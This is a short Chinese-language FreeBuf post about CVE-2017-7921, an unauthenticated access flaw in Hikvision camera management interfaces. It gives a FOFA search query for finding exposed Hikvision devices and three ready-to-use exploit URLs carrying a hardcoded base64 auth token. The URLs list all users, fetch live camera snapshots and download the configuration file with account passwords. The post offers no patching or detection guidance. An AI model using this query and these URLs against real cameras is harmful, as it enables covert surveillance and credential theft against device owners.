官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
CVE-2017-7921海康威视摄像头管理后台未授权+FOFA-网络空间测绘
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
CVE-2017-7921海康威视摄像头管理后台未授权+FOFA-网络空间测绘
一、漏洞概述:
杭州海康威视系统技术有限公司摄像头管理后台存在未授权,通过构造url可绕过登录查看监控,检索所有用户和配置文件下载。
fofa网址:fofa.so
fofa搜索:app="HIKVISION-视频监控"
二、漏洞利用:
1、利用路径:
http://your-ip/Security/users?auth=YWRtaW46MTEK
YWRtaW46MTEKadmin:11的base64编码
检索所有用户及其角色的列表。
2、利用路径:
http://your-ip/onvif-http/snapshot?auth=YWRtaW46MTEK
获取监控快照,不进行身份验证。
3、利用路径:
http://your-ip/System/configurationFile?auth=YWRtaW46MTEK
下载摄像头配置账号密码文件。
本文为 FreeBuf_336842 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
geek
相关推荐
FreeBuf_336842 LV.1
这家伙太懒了,还未填写个人描述!
- 1 文章数
- 1 关注者
文章目录